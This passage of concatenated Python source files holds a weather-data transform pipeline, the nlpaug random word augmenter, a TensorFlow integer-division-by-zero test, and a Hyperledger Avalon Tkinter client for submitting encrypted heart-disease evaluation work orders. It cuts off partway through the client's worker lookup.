return example
class VariableFilterTransform:
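    """Keep only the requested variables in the features dataset."""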
def __init__(self, to_filter=None):
self.to_filter = to_filter
if to_filter is not None:
_logger.info("Will filter vars: %s", to_filter)
def __call__(self, batch):
if self.to_filter is not None:
batch["features"] = batch["features"].sel(variable=self.to_filter)
return batch
def full_transform(
geography_file,
weeks_12=False,
make_distributions=False,
random_noise_sigma=0.0,
roll=False,
n_members=1,
filter_vars=None,
biweekly_features=False,
add_date=False,
):
xarray_transforms = [
MembersSubsetTransform(n_members),
AddLatLonFeature(),
AddGeographyFeatures(geography_file),
VariableFilterTransform(filter_vars),
AddBiweeklyDimTransform(weeks_12, features=biweekly_features),
]
if add_date:
xarray_transforms.insert(2, AddDateFeatureTransform())
if roll:
xarray_transforms.append(LongitudeRoll())
transforms = [
*xarray_transforms,
# LinearModelAdapter(make_distributions=make_distributions),
AddMetadata(),
ExampleToPytorch(),
CubeRootTP(),
RandomNoise(sigma=random_noise_sigma),
]
return CompositeTransform(transforms)
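# Example usage (a minimal sketch; "geography.nc" and the example dict are illustrative, not from this module):
#     transform = full_transform("geography.nc", weeks_12=False, n_members=3)
#     pytorch_example = transform(raw_example)  # raw_example: dict of xarray datasets plus availability flags, as built upstream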
|
py | 1a306f8e75fc5c36e9eaee2fea00ba106b3d312e | """
Augmenter that apply random word operation to textual input.
"""
from nlpaug.augmenter.word import WordAugmenter
from nlpaug.util import Action, Doc
class RandomWordAug(WordAugmenter):
"""
    Augmenter that applies random behavior for augmentation.
    :param str action: 'substitute', 'swap', 'delete' or 'crop'. If value is 'swap', adjacent words will be swapped randomly.
        If value is 'delete', words will be removed randomly. If value is 'crop', a set of contiguous words will be removed randomly.
    :param float aug_p: Percentage of words that will be augmented.
    :param int aug_min: Minimum number of words that will be augmented.
    :param int aug_max: Maximum number of words that will be augmented. If None is passed, the number of augmentations is
        calculated via aug_p. If the result calculated from aug_p is smaller than aug_max, the aug_p result is used.
        Otherwise, aug_max is used.
    :param list stopwords: List of words which will be skipped from the augment operation. Not effective if action is 'crop'.
    :param str stopwords_regex: Regular expression for matching words which will be skipped from the augment operation. Not effective if action is 'crop'.
    :param list target_words: List of words used for replacement (used for the substitute operation only). Default value is _.
:param func tokenizer: Customize tokenization process
:param func reverse_tokenizer: Customize reverse of tokenization process
:param str name: Name of this augmenter
>>> import nlpaug.augmenter.word as naw
>>> aug = naw.RandomWordAug()
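    >>> augmented_text = aug.augment("The quick brown fox jumps over the lazy dog")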
"""
def __init__(self, action=Action.DELETE, name='RandomWord_Aug', aug_min=1, aug_max=10, aug_p=0.3, stopwords=None,
target_words=None, tokenizer=None, reverse_tokenizer=None, stopwords_regex=None,
verbose=0):
super().__init__(
action=action, name=name, aug_p=aug_p, aug_min=aug_min, aug_max=aug_max, stopwords=stopwords,
tokenizer=tokenizer, reverse_tokenizer=reverse_tokenizer, device='cpu', verbose=verbose,
stopwords_regex=stopwords_regex, include_detail=False)
self.target_words = target_words or ['_']
# https://arxiv.org/pdf/1711.02173.pdf, https://arxiv.org/pdf/1809.02079.pdf, https://arxiv.org/pdf/1903.09460.pdf
def swap(self, data):
if not data or not data.strip():
return data
change_seq = 0
doc = Doc(data, self.tokenizer(data))
aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens())
# https://github.com/makcedward/nlpaug/issues/76
if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2:
if self.include_detail:
return data, []
return data
for aug_idx in aug_idxes:
swap_idx = self._get_swap_position(aug_idx, doc.size() - 1)
change_seq += 1
doc = self.change_case(doc, aug_idx, swap_idx, change_seq)
if self.include_detail:
return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()
else:
return self.reverse_tokenizer(doc.get_augmented_tokens())
# TODO: Tune it
def change_case(self, doc, original_word_idx, swap_word_idx, change_seq):
original_token = doc.get_token(original_word_idx).get_latest_token().token
swap_token = doc.get_token(swap_word_idx).get_latest_token().token
if original_word_idx != 0 and swap_word_idx != 0:
doc.add_change_log(original_word_idx, new_token=swap_token, action=Action.SWAP,
change_seq=self.parent_change_seq+change_seq)
doc.add_change_log(swap_word_idx, new_token=original_token, action=Action.SWAP,
change_seq=self.parent_change_seq+change_seq)
return doc
original_token_case = self.get_word_case(original_token)
swap_token_case = self.get_word_case(swap_token)
if original_word_idx == 0:
if original_token_case == 'capitalize' and swap_token_case == 'lower':
doc.add_change_log(original_word_idx, new_token=swap_token.capitalize(),
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
else:
doc.add_change_log(original_word_idx, new_token=swap_token,
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
if original_token_case == 'capitalize':
doc.add_change_log(swap_word_idx, new_token=original_token.lower(),
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
else:
doc.add_change_log(swap_word_idx, new_token=original_token,
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
if swap_word_idx == 0:
if original_token_case == 'lower':
doc.add_change_log(swap_word_idx, new_token=original_token.capitalize(),
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
else:
doc.add_change_log(swap_word_idx, new_token=original_token,
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
if swap_token_case == 'capitalize':
doc.add_change_log(original_word_idx, new_token=swap_token.lower(),
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
else:
doc.add_change_log(original_word_idx, new_token=swap_token,
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
# Special case for i
if doc.get_token(original_word_idx).get_latest_token().token == 'i':
doc.update_change_log(original_word_idx, token='I')
if doc.get_token(swap_word_idx).get_latest_token().token == 'i':
doc.update_change_log(swap_word_idx, token='I')
return doc
def _get_swap_position(self, pos, token_length):
if pos == 0:
# Force swap with next character if it is first character
return pos + 1
elif pos == token_length:
# Force swap with previous character if it is last character
return pos - 1
else:
return pos + self.sample([-1, 1], 1)[0]
# https://arxiv.org/pdf/1703.02573.pdf, https://arxiv.org/pdf/1712.06751.pdf, https://arxiv.org/pdf/1806.09030.pdf
# https://arxiv.org/pdf/1905.11268.pdf,
def substitute(self, data):
if not data or not data.strip():
return data
change_seq = 0
doc = Doc(data, self.tokenizer(data))
aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens())
        # Guard against an empty selection before sorting
        if aug_idxes is None or len(aug_idxes) == 0:
            if self.include_detail:
                return data, []
            return data
        aug_idxes.sort(reverse=True)
for aug_idx in aug_idxes:
original_token = doc.get_token(aug_idx).orig_token.token
new_token = self.sample(self.target_words, 1)[0]
if aug_idx == 0:
new_token = self.align_capitalization(original_token, new_token)
change_seq += 1
doc.add_change_log(aug_idx, new_token=new_token, action=Action.SUBSTITUTE, change_seq=self.parent_change_seq+change_seq)
if self.include_detail:
return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()
else:
return self.reverse_tokenizer(doc.get_augmented_tokens())
# https://arxiv.org/pdf/1905.11268.pdf, https://arxiv.org/pdf/1809.02079.pdf, https://arxiv.org/pdf/1903.09460.pdf
def delete(self, data):
if not data or not data.strip():
return data
change_seq = 0
doc = Doc(data, self.tokenizer(data))
aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens())
        # https://github.com/makcedward/nlpaug/issues/76
        # Guard against an empty selection before sorting
        if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2:
            if self.include_detail:
                return data, []
            return data
        aug_idxes.sort(reverse=True)
for aug_idx in aug_idxes:
original_token = doc.get_token(aug_idx).orig_token.token
change_seq += 1
doc.add_change_log(aug_idx, new_token='', action=Action.DELETE, change_seq=self.parent_change_seq+change_seq)
if aug_idx == 0:
new_token = self.align_capitalization(original_token, doc.get_token(1).orig_token.token)
doc.add_change_log(1, new_token=new_token, action=Action.ALIGN, change_seq=self.parent_change_seq+change_seq)
if self.include_detail:
return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()
else:
return self.reverse_tokenizer(doc.get_augmented_tokens())
# https://github.com/makcedward/nlpaug/issues/126
def crop(self, data):
if not data or not data.strip():
return data
change_seq = 1
doc = Doc(data, self.tokenizer(data))
aug_idxes = self._get_aug_range_idxes(doc.get_original_tokens())
        # https://github.com/makcedward/nlpaug/issues/76
        # Guard against an empty selection before sorting
        if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2:
            if self.include_detail:
                return data, []
            return data
        aug_idxes.sort(reverse=True)
for aug_idx in aug_idxes:
original_token = doc.get_token(aug_idx).orig_token.token
doc.add_change_log(aug_idx, new_token='', action=Action.CROP, change_seq=self.parent_change_seq+change_seq)
if aug_idx == 0:
new_token = self.align_capitalization(original_token, doc.get_token(1).orig_token.token)
doc.add_change_log(1, new_token=new_token, action=Action.ALIGN, change_seq=self.parent_change_seq+change_seq)
if self.include_detail:
return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()
else:
return self.reverse_tokenizer(doc.get_augmented_tokens())
|
py | 1a306ffcdb9dc4ddf95e5ed6a658059fb7050757 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for integer division by zero."""
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.platform import test
class ZeroDivisionTest(test.TestCase):
def testZeros(self):
with test_util.use_gpu():
for dtype in dtypes.uint8, dtypes.int16, dtypes.int32, dtypes.int64:
zero = constant_op.constant(0, dtype=dtype)
one = constant_op.constant(1, dtype=dtype)
bads = [lambda x, y: x // y]
if dtype in (dtypes.int32, dtypes.int64):
bads.append(lambda x, y: x % y)
for bad in bads:
try:
result = self.evaluate(bad(one, zero))
except (errors.OpError, errors.InvalidArgumentError) as e:
# Ideally, we'd get a nice exception. In theory, this should only
# happen on CPU, but 32 bit integer GPU division is actually on
# CPU due to a placer bug.
# TODO(irving): Make stricter once the placer bug is fixed.
self.assertIn('Integer division by zero', str(e))
else:
# On the GPU, integer division by zero produces all bits set.
# But apparently on some GPUs "all bits set" for 64 bit division
# means 32 bits set, so we allow 0xffffffff as well. This isn't
# very portable, so we may need to expand this list if other GPUs
# do different things.
#
# XLA constant folds integer division by zero to 1.
self.assertTrue(test.is_gpu_available())
self.assertIn(result, (-1, 1, 2, 0xff, 0xffffffff))
if __name__ == '__main__':
test.main()
|
py | 1a307057e4332a646673c0910d799d5bbcafe4c8 | #! /usr/bin/env python3
# Copyright 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Heart Evaluation GUI Client for use in submitting data to worker.
"""
import os
import sys
import random
import json
import argparse
import logging
import secrets
# Tkinter imports
import tkinter as tk
import tkinter.messagebox as messagebox
import tkinter.font as font
from PIL import ImageTk, Image
# Avalon imports
import crypto_utils.crypto_utility as utility
import avalon_sdk.worker.worker_details as worker
from avalon_sdk.worker.worker_details import WorkerType
from avalon_sdk.work_order.work_order_params import WorkOrderParams
from avalon_sdk.direct.avalon_direct_client import AvalonDirectClient
import config.config as pconfig
import utility.logger as plogger
import crypto_utils.crypto.crypto as crypto
from error_code.error_status import WorkOrderStatus, ReceiptCreateStatus
import crypto_utils.signature as signature
from error_code.error_status import SignatureStatus
from avalon_sdk.work_order_receipt.work_order_receipt \
import WorkOrderReceiptRequest
# Remove duplicate loggers
for handler in logging.root.handlers[:]:
logging.root.removeHandler(handler)
logger = logging.getLogger(__name__)
# Default TCFHOME assumes PWD is examples/apps/heart_disease_eval/client :
TCFHOME = os.environ.get("TCF_HOME", "../../../../")
# GUI color scheme
BACKGROUND = "light sky blue"
ENTRY_COLOR = "light grey"
BUTTON_COLOR = "deep sky blue"
RESULT_BACKGROUND = "pale goldenrod"
# -----------------------------------------------------------------
def _generate_random_or_normal_number(normal, percent_normal, low, high):
"""Generate number "normal" for "percent_normal" % of the time.
Otherwise, generate a random number in the interval ["low", "high"].
"""
if percent_normal >= random.randint(0, 100):
return normal
return random.randint(low, high)
def _generate_random_data():
"""Generate a random data string for input as evaluation data.
For example: "35 0 1 67 102 125 1 95 0 10 1 1 3 1"
"""
age = _generate_random_or_normal_number(35, 67, 18, 100)
sex = _generate_random_or_normal_number(0, 50, 1, 1)
cp = _generate_random_or_normal_number(4, 67, 1, 3)
trestbps = _generate_random_or_normal_number(67, 67, 108, 218)
chol = _generate_random_or_normal_number(102, 67, 126, 309)
fbs = _generate_random_or_normal_number(125, 67, 98, 248)
restecg = _generate_random_or_normal_number(0, 67, 1, 2)
thalach = _generate_random_or_normal_number(95, 67, 61, 198)
exang = _generate_random_or_normal_number(0, 67, 1, 1)
oldpeak = _generate_random_or_normal_number(10, 67, 0, 100)
slop = _generate_random_or_normal_number(0, 67, 1, 2)
ca = _generate_random_or_normal_number(0, 67, 1, 3)
thaldur = _generate_random_or_normal_number(3, 67, 6, 7)
num = _generate_random_or_normal_number(0, 67, 1, 1)
return "{} {} {} {} {} {} {} {} {} {} {} {} {} {}".format(
age, sex, cp, trestbps, chol, fbs, restecg, thalach,
exang, oldpeak, slop, ca, thaldur, num)
def _int_validate(text):
"""Validates that input is a non-negative integer."""
if str.isdigit(text) or text == "":
return True
else:
return False
def _float_validate(text):
"""Validates that input is a non-negative, non-special float."""
if text == "":
return True
try:
float(text)
if float(text) < 0.0 or float(text) == float("NaN") \
or float(text) == float("INF") \
or float(text) == float("-INF"):
return False
return True
except ValueError:
return False
class intEntry:
"""User entry for non-negative integer."""
def __init__(self, master, name):
global cur_row
label = tk.Label(master, text=name, background=BACKGROUND)
label.grid(row=cur_row, column=0, sticky="e", pady=(5, 0))
validate = (master.register(_int_validate))
self.entry = tk.Entry(
master, validate="all",
validatecommand=(validate, "%P"), width=5,
background=ENTRY_COLOR)
self.entry.grid(
row=cur_row, column=1, padx=(10, 0), pady=(5, 0), sticky="w")
cur_row += 1
def get(self):
# Fails if empty field
try:
return int(self.entry.get())
except ValueError:
return None
def enable(self):
self.entry.config(state=tk.NORMAL)
def disable(self):
self.entry.config(state=tk.DISABLED)
class floatEntry:
"""User entry for non-negative, non-special floating point number."""
def __init__(self, master, name):
global cur_row
label = tk.Label(master, text=name, background=BACKGROUND)
label.grid(row=cur_row, column=0, sticky="e", pady=(5,))
validate = (master.register(_float_validate))
self.entry = tk.Entry(
master, validate="all",
validatecommand=(validate, "%P"), width=10,
background=ENTRY_COLOR)
self.entry.grid(row=cur_row, column=1, padx=(10, 0), pady=(5,),
sticky="w")
cur_row += 1
def get(self):
try:
return float(self.entry.get())
except ValueError:
return None
def enable(self):
self.entry.config(state=tk.NORMAL)
def disable(self):
self.entry.config(state=tk.DISABLED)
class radio:
"""User entry for a radio button."""
# Options is a list of text-value pairs
def __init__(self, master, name, options):
global cur_row
if not all(len(tup) == 2 for tup in options):
print("ERROR: Mismatched text-value pairs")
exit(1)
self.var = tk.IntVar()
self.var.set(None)
label = tk.Label(master, text=name, background=BACKGROUND)
label.grid(row=cur_row, column=0, pady=(5, 0), sticky="e")
self.button_list = []
for i in range(len(options)):
button = tk.Radiobutton(
master, text=options[i][0],
variable=self.var, value=options[i][1],
background=BACKGROUND)
self.button_list.append(button)
if i == 0:
button.grid(row=cur_row, column=1, pady=(5, 0),
sticky="w")
else:
button.grid(row=cur_row, column=1, sticky="w")
cur_row += 1
def get(self):
try:
return self.var.get()
except tk.TclError:
return None
def enable(self):
for button in self.button_list:
button.config(state=tk.NORMAL)
def disable(self):
for button in self.button_list:
button.config(state=tk.DISABLED)
class resultWindow(tk.Toplevel):
"""Create result window that appears after clicking "Evaluate"."""
def __init__(self, parent, message):
tk.Toplevel.__init__(self, parent)
self.config(background=RESULT_BACKGROUND)
self.parent = parent
# Lock main window
self.transient(parent)
self.grab_set()
self.initial_focus = self
self.initial_focus.focus_set()
self.title("Evaluation Result")
self.protocol("WM_DELETE_WINDOW", self.close)
# Main content
self.main_frame = tk.Frame(self, background=RESULT_BACKGROUND)
self.main_frame.pack()
self.frame1 = tk.Frame(self.main_frame)
self.frame1.pack(side=tk.LEFT)
self.result_text = tk.StringVar()
self.label = tk.Label(
self.frame1, textvariable=self.result_text, width=45,
background=RESULT_BACKGROUND)
default_font = font.Font(font="TkDefaultFont")
new_font = default_font
new_font.config(weight=font.BOLD)
self.label.config(font=new_font)
self.label.pack()
# JSON window display sidebar buttons
self.frame2 = tk.Frame(self.main_frame, background=RESULT_BACKGROUND)
self.frame2.pack(side=tk.LEFT)
self.frame2 = tk.Frame(
self.frame2, background=RESULT_BACKGROUND)
self.frame2.pack(side=tk.LEFT)
self.request_button = tk.Button(
self.frame2, text="View Request", command=self.request,
background=BUTTON_COLOR)
self.request_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0))
self.result_button = tk.Button(
self.frame2, text="View Result", command=self.result,
background=BUTTON_COLOR)
self.result_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0))
self.receipt_button = tk.Button(
self.frame2, text="View Receipt",
command=self.receipt, background=BUTTON_COLOR)
self.receipt_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0))
# Close button
self.close_button = tk.Button(
self, text="Close",
command=self.close, background=BUTTON_COLOR)
self.close_button.pack(pady=(0, 5))
self.evaluate(message)
def evaluate(self, message):
"""Create and submit workorder and wait for result."""
self.result_text.set("Waiting for evaluation result...")
self.update()
# Create, sign, and submit workorder.
# Convert workloadId to hex.
workload_id = "heart-disease-eval"
workload_id = workload_id.encode("UTF-8").hex()
session_iv = utility.generate_iv()
session_key = utility.generate_key()
requester_nonce = secrets.token_hex(16)
work_order_id = secrets.token_hex(32)
requester_id = secrets.token_hex(32)
wo_params = WorkOrderParams(
work_order_id, worker_id, workload_id, requester_id,
session_key, session_iv, requester_nonce,
result_uri=" ", notify_uri=" ",
worker_encryption_key=worker_obj.encryption_key,
data_encryption_algorithm="AES-GCM-256"
)
wo_params.add_in_data(message)
wo_params.add_encrypted_request_hash()
private_key = utility.generate_signing_keys()
if requester_signature:
# Add requester signature and requester verifying_key
if wo_params.add_requester_signature(private_key) is False:
logger.info("Work order request signing failed")
exit(1)
# Set text for JSON sidebar
req_id = 51
self.request_json = wo_params.to_jrpc_string(req_id)
work_order_instance = direct_jrpc.get_work_order_instance()
response = work_order_instance.work_order_submit(
wo_params.get_work_order_id(),
wo_params.get_worker_id(),
wo_params.get_requester_id(),
wo_params.to_string(),
id=req_id
)
logger.info("Work order submit response : {}\n ".format(
json.dumps(response, indent=4)
))
if "error" in response and response["error"]["code"] != \
WorkOrderStatus.PENDING:
sys.exit(1)
# Create work order receipt
req_id += 1
wo_receipt_instance = direct_jrpc.get_work_order_receipt_instance()
wo_request = json.loads(self.request_json)
wo_receipt_obj = WorkOrderReceiptRequest()
wo_create_receipt = wo_receipt_obj.create_receipt(
wo_request,
ReceiptCreateStatus.PENDING.value,
private_key
)
logger.info("Work order create receipt request : {} \n \n ".format(
json.dumps(wo_create_receipt, indent=4)
))
# Submit work order create receipt jrpc request
wo_receipt_resp = wo_receipt_instance.work_order_receipt_create(
wo_create_receipt["workOrderId"],
wo_create_receipt["workerServiceId"],
wo_create_receipt["workerId"],
wo_create_receipt["requesterId"],
wo_create_receipt["receiptCreateStatus"],
wo_create_receipt["workOrderRequestHash"],
wo_create_receipt["requesterGeneratedNonce"],
wo_create_receipt["requesterSignature"],
wo_create_receipt["signatureRules"],
wo_create_receipt["receiptVerificationKey"],
req_id
)
logger.info("Work order create receipt response : {} \n \n ".format(
wo_receipt_resp
))
# Retrieve result and set GUI result text
res = work_order_instance.work_order_get_result(
work_order_id,
req_id
)
self.result_json = json.dumps(res, indent=4)
if "result" in res:
sig_obj = signature.ClientSignature()
status = sig_obj.verify_signature(
res, worker_obj.verification_key)
try:
if status == SignatureStatus.PASSED:
logger.info("Signature verification Successful")
decrypted_res = utility. \
decrypted_response(res, session_key, session_iv)
logger.info("\n" +
"Decrypted response:\n {}".
format(decrypted_res))
else:
logger.info("Signature verification Failed")
sys.exit(1)
except Exception as err:
logger.info("ERROR: Failed to decrypt response: %s", str(err))
sys.exit(1)
else:
logger.info("\n Work order get result failed {}\n".format(res))
sys.exit(1)
# Set text for JSON sidebar
self.result_text.set(
decrypted_res[0]["data"])
# Retrieve receipt
# Set text for JSON sidebar
req_id += 1
self.receipt_json = json.dumps(
wo_receipt_instance.work_order_receipt_retrieve(
work_order_id,
req_id
),
indent=4
)
def request(self):
jsonWindow(self, self.request_json, "Request JSON")
def result(self):
jsonWindow(self, self.result_json, "Result JSON")
def receipt(self):
jsonWindow(self, self.receipt_json, "Receipt JSON")
def close(self):
self.parent.focus_set()
self.destroy()
class jsonWindow(tk.Toplevel):
"""Template for JSON display
(from clicking View Request/Result/Receipt buttons).
"""
def __init__(self, parent, json, title):
tk.Toplevel.__init__(self, parent)
self.title(title)
self.scrollbar = tk.Scrollbar(self)
self.scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
self.text = tk.Text(self, yscrollcommand=self.scrollbar.set)
self.text.insert(tk.END, json)
self.text.config(state=tk.DISABLED)
self.text.pack(expand=True, fill="both")
self.scrollbar.config(command=self.text.yview)
def gui_main():
"""Create main Tkinter window and "Evaluate" event handler."""
root = tk.Tk()
root.title("Heart Disease Evaluation")
root.config(background=BACKGROUND)
# Display image
imageFile = TCFHOME + \
"/examples/apps/heart_disease_eval/images/ecg.jpg"
img = ImageTk.PhotoImage(Image.open(imageFile))
canvas = tk.Canvas(root, width=290, height=220, background=BACKGROUND)
canvas.pack()
canvas.create_image(20, 20, anchor=tk.NW, image=img)
# Setup left and right frames for data entry
var_root = tk.Frame(root, background=BACKGROUND)
var_root.pack(pady=(10, 0))
v_frame1 = tk.Frame(var_root, background=BACKGROUND)
v_frame1.pack(fill=tk.Y, side=tk.LEFT, padx=(10, 0))
v_frame2 = tk.Frame(var_root, background=BACKGROUND)
v_frame2.pack(fill=tk.Y, side=tk.LEFT, padx=(0, 10))
# Organizes parameter grid
global cur_row
cur_row = 0
# Parameter grid
age = intEntry(v_frame1, "Age")
sex = radio(v_frame1, "Sex", [("Male", 1), ("Female", 0)])
cp = radio(v_frame1, "Chest pain type", [("Typical angina", 1),
("Atypical angina", 2), ("Non-anginal pain", 3),
("Asymptomatic", 4)])
trestbps = intEntry(v_frame1, "Resting blood pressure\n (mm Hg)")
chol = intEntry(v_frame1, "Serum cholesterol (mg/dl)")
fbs = intEntry(v_frame1, "Fasting blood sugar (mg/dl)")
restecg = radio(v_frame1, "Electrocardiographic\n resting results",
[("Normal", 0), ("ST-T wave abnormality", 1),
("Showing hypertrophy", 2)])
thalach = intEntry(v_frame1, "Maximum heart rate")
exang = radio(v_frame2, "Exercise induced angina",
[("Yes", 1), ("No", 0)])
oldpeak = floatEntry(
v_frame2, "ST depression induced by\n exercise relative to rest")
slope = radio(v_frame2, "Slope of the peak\n exercise ST segment",
[("Upsloping", 0), ("Flat", 1), ("Downsloping", 2)])
ca = radio(v_frame2, "Major vessels colored\n by flouroscopy",
[("0", 0), ("1", 1), ("2", 2), ("3", 3)])
thal = radio(
v_frame2,
"Thallium stress test",
[("Normal", 3), ("Fixed defect", 6), ("Reversible defect", 7)])
num = radio(v_frame2, "Heart disease diagnosis",
[("<50% diameter narrowing", 0),
(">50% diameter narrowing", 1)])
var_list = [age, sex, cp, trestbps, chol, fbs, restecg, thalach,
exang, oldpeak, slope, ca, thal, num]
def string_toggle():
"""Disable/enable other variable entries/buttons based on
whether string input option is selected.
"""
if string_use.get() == 1 or random_use.get() == 1:
for var in var_list:
var.disable()
string_entry.config(state=tk.NORMAL)
else:
for var in var_list:
var.enable()
string_entry.config(state=tk.DISABLED)
# Input vars as string option with a check button to enable
random_frame = tk.Frame(root, background=ENTRY_COLOR)
random_frame.pack()
# Option to generate random data entry
random_use = tk.IntVar()
random_check = tk.Checkbutton(
random_frame, command=string_toggle, variable=random_use,
background=BACKGROUND)
random_check.pack(side=tk.LEFT)
random_label = tk.Label(
random_frame,
text="Generate random data ",
background=BACKGROUND)
random_label.pack(side=tk.LEFT)
# Option to enter data as space-separated string entries
string_frame = tk.Frame(root, background=ENTRY_COLOR)
string_frame.pack()
string_use = tk.IntVar()
string_check = tk.Checkbutton(
string_frame, command=string_toggle, variable=string_use,
background=BACKGROUND)
string_check.pack(side=tk.LEFT)
string_label = tk.Label(
string_frame,
text="Input variables as a string",
background=BACKGROUND)
string_label.pack(side=tk.LEFT)
string_entry = tk.Entry(
string_frame, state=tk.DISABLED, width=50,
background=ENTRY_COLOR)
string_entry.pack(side=tk.LEFT)
def evaluate():
"""Open window that will submit work order and retrieve
an evaluation result.
"""
message = "Heart disease evaluation data: "
if string_use.get() == 1: # input is space-separated numbers
input_data = string_entry.get()
if input_data is None or len(input_data) == 0:
messagebox.showwarning(
"Error", "Must input space-separated variables")
return
message = message + input_data
elif random_use.get() == 1:
input_data = _generate_random_data()
if input_data is None or len(input_data) == 0:
messagebox.showwarning(
"Error", "Random variable generation error")
return
message = message + input_data
else:
for var in var_list:
if var.get() is None:
messagebox.showwarning("Error", "Must input all variables")
return
message = message + str(var.get()) + " "
root.wait_window(resultWindow(root, message))
def aggregate():
"""Open window that will submit work order to retrieve
an aggregate result.
"""
message = "Heart disease aggregate data: "
root.wait_window(resultWindow(root, message))
# "Evaluate" button
eval_text = tk.StringVar()
eval_label = tk.Label(root, textvariable=eval_text,
background=BACKGROUND)
eval_label.pack()
eval_button = tk.Button(root, text="Evaluate", command=evaluate,
background=BUTTON_COLOR)
eval_button.pack()
# "Aggregate" button
aggr_text = tk.StringVar()
aggr_label = tk.Label(root, textvariable=aggr_text, background=BACKGROUND)
aggr_label.pack()
aggr_button = tk.Button(root, text="Aggregate all data",
command=aggregate, background=BUTTON_COLOR)
aggr_button.pack(pady=(0, 10))
root.mainloop()
def parse_command_line(args):
"""Setup and parse command line arguments and help information."""
global worker_obj
global worker_id
global verbose
global config
global off_chain
global requester_signature
parser = argparse.ArgumentParser()
use_service = parser.add_mutually_exclusive_group()
parser.add_argument(
"-c", "--config",
help="the config file containing the" +
" Ethereum contract information", type=str)
use_service.add_argument(
"-r", "--registry-list",
help="the Ethereum address of the registry list",
type=str)
use_service.add_argument(
"-s", "--service-uri",
help="skip URI lookup and send to specified URI",
type=str)
use_service.add_argument(
"-o", "--off-chain",
help="skip URI lookup and use the registry in the config file",
action="store_true")
parser.add_argument(
"-w", "--worker-id",
help="skip worker lookup and retrieve specified worker",
type=str)
parser.add_argument(
"-v", "--verbose",
help="increase output verbosity",
action="store_true")
parser.add_argument(
"-rs", "--requester_signature",
help="Enable requester signature for work order requests",
action="store_true")
options = parser.parse_args(args)
if options.config:
conf_files = [options.config]
else:
conf_files = [TCFHOME +
"/sdk/avalon_sdk/tcf_connector.toml"]
conf_paths = ["."]
try:
config = pconfig.parse_configuration_files(conf_files, conf_paths)
json.dumps(config, indent=4)
except pconfig.ConfigurationException as e:
logger.error(str(e))
sys.exit(-1)
global direct_jrpc
direct_jrpc = AvalonDirectClient(conf_files[0])
# Whether or not to connect to the registry list on the blockchain
off_chain = False
if options.registry_list:
config["ethereum"]["direct_registry_contract_address"] = \
options.registry_list
if options.service_uri:
service_uri = options.service_uri
off_chain = True
if options.off_chain:
service_uri = config["tcf"].get("json_rpc_uri")
off_chain = True
requester_signature = options.requester_signature
verbose = options.verbose
worker_id = options.worker_id
# Initializing Worker Object
worker_obj = worker.SGXWorkerDetails()
def initialize_logging(config):
"""Initialize logging."""
if verbose:
config["Logging"] = {
"LogFile": "__screen__",
"LogLevel": "INFO"
}
else:
config["Logging"] = {
"LogFile": "__screen__",
"LogLevel": "WARN"
}
plogger.setup_loggers(config.get("Logging", {}))
sys.stdout = plogger.stream_to_logger(
logging.getLogger("STDOUT"), logging.DEBUG)
sys.stderr = plogger.stream_to_logger(
logging.getLogger("STDERR"), logging.WARN)
def initialize_tcf(config):
"""Initialize Avalon: get Avalon worker instance."""
logger.info("***************** Avalon *****************")
# Retrieve Worker Registry
if not off_chain:
registry_list_instance = direct_jrpc. \
get_worker_registry_list_instance()
registry_count, lookup_tag, registry_list = \
registry_list_instance.registry_lookup()
logger.info("\n Registry lookup response : registry count {}\
lookup tag {} registry list {}\n".format(
registry_count, lookup_tag, registry_list
))
if (registry_count == 0):
logger.warn("No registries found")
sys.exit(1)
registry_retrieve_result = \
registry_list_instance.registry_retrieve(
registry_list[0])
logger.info("\n Registry retrieve response : {}\n".format(
registry_retrieve_result
))
config["tcf"]["json_rpc_uri"] = registry_retrieve_result[0]
# Prepare worker
global worker_id
if not worker_id:
worker_registry_instance = direct_jrpc.get_worker_registry_instance()
req_id = 31
worker_lookup_result = worker_registry_instance.worker_lookup(
worker_type=WorkerType.TEE_SGX,
id=req_id
)
logger.info("\n Worker lookup response : {} \n".format(
json.dumps(worker_lookup_result, indent=4)
))
if "result" in worker_lookup_result and \
"ids" in worker_lookup_result["result"].keys():
if worker_lookup_result["result"]["totalCount"] != 0:
worker_id = \
worker_lookup_result["result"]["ids"][0]
else:
logger.error("ERROR: No workers found")
sys.exit(1)
else:
logger.error("ERROR: Failed to lookup worker")
sys.exit(1)
req_id += 1
